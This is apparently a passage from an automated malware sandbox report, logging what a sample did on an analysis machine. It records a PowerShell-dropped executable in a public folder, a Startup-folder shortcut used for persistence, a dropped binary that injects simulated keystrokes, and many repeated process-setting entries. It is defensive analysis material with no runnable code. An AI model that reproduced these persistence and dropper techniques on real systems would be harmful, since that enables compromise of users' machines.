Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B44514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00007FF6B5B44514
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
